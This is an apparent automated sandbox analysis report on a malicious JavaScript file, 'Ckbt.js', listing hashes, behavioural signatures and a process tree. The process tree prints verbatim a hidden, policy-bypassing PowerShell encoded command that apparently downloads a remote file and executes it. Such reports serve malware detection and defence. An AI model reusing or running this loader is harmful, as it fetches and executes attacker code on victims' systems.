Analysis
-
max time kernel
31s -
max time network
33s -
platform
windows7_x64 -
resource
win7-20230220-en -
resource tags
arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system -
submitted
16/05/2023, 13:29
Static task
static1
Behavioral task
behavioral1
Sample
Ckbt.js
Resource
win7-20230220-en
4 signatures
150 seconds
Behavioral task
behavioral2
Sample
Ckbt.js
Resource
win10v2004-20230220-en
6 signatures
150 seconds
General
-
Target
Ckbt.js
-
Size
218KB
-
MD5
5766bc8031a485df0b03b1dd15b82d3d
-
SHA1
2cdf7ee78a24e06f9fd5d3e7d515bf60774c720f
-
SHA256
eec2d6c95416d1ef00e5e37fbd36ae388a24bee4986cde2d9cfebf6d25263a95
-
SHA512
4cc2b87bce4ff89e559792ecb944365cdb24afc622532bdf5756a5572a02449a999e6d9ebc96111d527c0e67465ee3c2bed25dd3996865f27e0892e5025e866c
-
SSDEEP
1536:mDS8/yqz10JirHyPUGNjb03yySCpyzn4QrYO9PmJNxw5xUPKY0HdOSLLdmU+xcAm:t8aqz10DH8yQK4QrYO9PmNLx9xIr
Score
3/10
Malware Config
Signatures
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 1692 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 1692 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 1676 wrote to memory of 1776 1676 wscript.exe 28 PID 1676 wrote to memory of 1776 1676 wscript.exe 28 PID 1676 wrote to memory of 1776 1676 wscript.exe 28 PID 1776 wrote to memory of 1692 1776 wscript.exe 29 PID 1776 wrote to memory of 1692 1776 wscript.exe 29 PID 1776 wrote to memory of 1692 1776 wscript.exe 29
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\Ckbt.js1⤵
- Suspicious use of WriteProcessMemory
PID:1676 -
C:\Windows\System32\wscript.exe"C:\Windows\System32\wscript.exe" "C:\Users\Admin\AppData\Local\Temp\Ckbt.js" PercenterTrimotor patronne2⤵
- Suspicious use of WriteProcessMemory
PID:1776 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -ExecutionPolicy Bypass -NoLogo -NoProfile -encodedcommand "JABtAG8AbgBvAGMAaABhAHMAaQBhAE4AbwB0AGUAcABhAGQAIAA9ACAAIgBNAGUAcwBtAGUAcgBpAHoAYQBiAGwAZQBBAHIAYwBoAGUAcwBwAG8AcgBpAGEAIgA7ACQATwBtAG4AaQB2AGEAcgBpAG8AdQBzACAAPQAgADQAOQA0ADsAJABBAHIAcgB1AGEAZwB1AGUAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBOAGcAQQA1AEEAQwA0AEEATgBnAEEANQBBAEMANABBAE8AQQBBADQAQQBDADQAQQBNAFEAQQAxAEEARABJAEEARgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEkAQQBOAFEAQQB4AEEAQwA0AEEATgBnAEEAdwBBAEMANABBAE0AUQBBADEAQQBEAEUAQQBMAGcAQQB5AEEARABNAEEATQBnAEEAPQAiADsAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMQAwADsAJABuAG8AbgBjAG8AbgB2AGUAcgB0AGkAYgBsAHkARABvAHcAYQBnAGUAcgBpAHMAbQAgAD0AIAAiAFUAbgBkAGUAcgBtAG8AdABpAG8AbgBCAG8AdABhAG4AaQB6AGUAZAAiADsAJABSAGUAYgByAHUAcwBoAEQAaQBwAGwAbwBnAGwAbwBzAHMAYQB0AGEAIAA9ACAANQAyADEAOwAkAE4AbwBuAHMAdwBpAG0AbQBlAHIAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBOAFEAQQB4AEEAQwA0AEEATgB3AEEAMgBBAEMANABBAE4AUQBBAHcAQQBDADQAQQBNAGcAQQAwAEEARABNAEEAdQBpAG0AUABhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAEoAQQBHAFEAQQBhAFEAQgB2AEEASABJAEEAYwBnAEIAbwBBAEgAawBBAGQAQQBCAG8AQQBHADAAQQBlAFEAQgBWAEEARwA0AEEAYwBnAEIAbABBAEcAYwBBAGMAZwBCAGwAQQBIAFEAQQBaAGcAQgAxAEEARwB3AEEATABnAEIAagBBAEgASQBBAGEAUQBCAGoAQQBHAHMAQQBaAFEAQgAwAEEAQQA9AD0AIgA7ACQAcwB1AHAAZQByAG8AcAB0AGkAbQBpAHMAdABVAHIAYQBsAGkAbgBlACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQA1AEEARABFAEEATABnAEEAeABBAEQAawBBAE0AdwBBAHUAQQBEAFEAQQBNAHcAQQB1AEEARABFAEEATQBRAEEANQBBAEMAOABBAGQAQQBCAE8AQQBHAFkAQQBMAHcAQgBwAEEARQBvAEEAWgBRAEIAMABBAEgAUQBBAHEAZgBhAFEAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQAzAEEARABjAEEATABnAEEANQBBAEQARQBBAEwAZwBBADQAQQBEAFkAQQBMAGcAQQB4AEEARABJAEEATQBnAEEAdgBBAEYAWQBBAGIAQQBCAHcAQQBGAFEAQQBMAHcAQgBDAEEARQB3AEEAUgBBAEIAaQBBAEUASQBBAFoAZwBCAG0AQQBBAD0APQAiADsAZgBvAHIAZQBhAGMAaAAgACgAJABjAG8AbgBzAHQAaQB0AHUAdABlAFAAaQBsAGkAZQBzACAAaQBuACAAJABzAHUAcABlAHIAbwBwAHQAaQBtAGkAcwB0AFUAcgBhAGwAaQBuAGUAIAAtAHMAcABsAGkAdAAgACIAcQBmAGEAUQAiACkAIAB7ACQAbABpAHQAdABsAGUAbgBlAGMAawAgAD0AIAAyADgAMgA7ACQAQwByAHkAcAB0AG8AZwByAGEAbQBtAGkAYwAgAD0AIAA1ADUANgA7ACQAQgBlAHMAdABlAGEAbAAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAdwBBAEcARQBBAGIAQQBCAGgAQQBIAEUAQQBkAFEAQgBwAEEASABVAEEAYgBRAEIARABBAEcAOABBAGIAQQBCADEAQQBHADAAQQBZAGcAQgBwAEEARwBVAEEAYwBnAEEAdQBBAEcAdwBBAGEAUQBCAG0AQQBHAFUAQQAiADsAdAByAHkAIAB7ACQAUgBlAGEAYgBzAG8AcgBiAFMAdQBwAGUAcgBjAG8AbgBmAGkAcgBtAGEAdABpAG8AbgAgAD0AIAAiAFAAcgBvAHAAYQBnAHUAbABlACIAOwAkAEkAZABlAG4AdABpAGMAIAA9ACAANwA3ADcAOwAkAHMAbgBvAGIAYgBpAHMAaAAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABjAG8AbgBzAHQAaQB0AHUAdABlAFAAaQBsAGkAZQBzACkAKQA7AGkAdwByACAAJABzAG4AbwBiAGIAaQBzAGgAIAAtAE8AIABDADoAXABQAHIAbwBnAHIAYQBtAEQAYQB0AGEAXABXAGEAdgBpAHIAYQBQAGgAYQBuAHQAbwBtAHMALgBDAHUAYwB1AG0AYgBlAHIAOwAkAHIAZQBmAHIAYQBjAHQAaQB2AGUAbAB5AEIAcgBvAGMAaABvACAAPQAgACIAUwBoAGUAaABpAHQAYQBIAGUAdABlAHIAbwBkAHIAbwBtAHkAIgA7AGkAZgAgACgAKABHAGUAdAAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIABDADoAXABQAHIAbwBnAHIAYQBtAEQAYQB0AGEAXABXAGEAdgBpAHIAYQBQAGgAYQBuAHQAbwBtAHMALgBDAHUAYwB1AG0AYgBlAHIAKQAuAEwAZQBuAGcAdABoACAALQBnAGUAIAAxADMANAA3ADMANQApAHsAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AZQBuAGMAbwBkAGUAZABjAG8AbQBtAGEAbgBkACAAIgBjAHcAQgAwAEEARwBFAEEAYwBnAEIAMABBAEMAQQBBAGMAZwBCADEAQQBHADQAQQBaAEEAQgBzAEEARwB3AEEATQB3AEEAeQBBAEMAQQBBAFEAdwBBADYAQQBGAHcAQQBVAEEAQgB5AEEARwA4AEEAWgB3AEIAeQBBAEcARQBBAGIAUQBCAEUAQQBHAEUAQQBkAEEAQgBoAEEARgB3AEEAVgB3AEIAaABBAEgAWQBBAGEAUQBCAHkAQQBHAEUAQQBVAEEAQgBvAEEARwBFAEEAYgBnAEIAMABBAEcAOABBAGIAUQBCAHoAQQBDADQAQQBRAHcAQgAxAEEARwBNAEEAZABRAEIAdABBAEcASQBBAFoAUQBCAHkAQQBDAHcAQQBjAEEAQgB5AEEARwBrAEEAYgBnAEIAMABBAEQAcwBBAFYAZwBCADEAQQBHAFUAQQBTAGcAQgBUAEEAQQA9AD0AIgA7ACQAVQBuAHAAcgBlAGMAZQBkAGUAbgB0AGUAZAAgAD0AIAAiAEMAbwBuAGQAZQBuAHMAaQBuAGcAUABhAHQAZQByAG4AYQBsAGkAcwB0AGkAYwAiADsAJABpAHIAcgBlAGcAYQByAGQAbABlAHMAcwAgAD0AIAA1ADMAOAA7AGIAcgBlAGEAawA7AFYAdQBlAEoAUwA7AH0AVgB1AGUASgBTADsAfQAgAGMAYQB0AGMAaAAgAHsAJABUAGEAcgBhAGQAaQBkAGQAbABlAEEAbgB0AGkAcwBlAHIAdQBtAHMAIAA9ACAAMwA4ADQAOwAkAHUAbAB0AHIAYQBzAFMAZQBsAGUAbgBpAHQAaQBmAGUAcgBvAHUAcwAgAD0AIAA5ADkAOwAkAHMAaQBuAGcAdQBsAGEAcgBsAHkAIAA9ACAANAA3ADIAOwB9AH0AJABBAGUAcgBvAGcAdQBuACAAPQAgADgAMAA4ADsA"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1692
-
-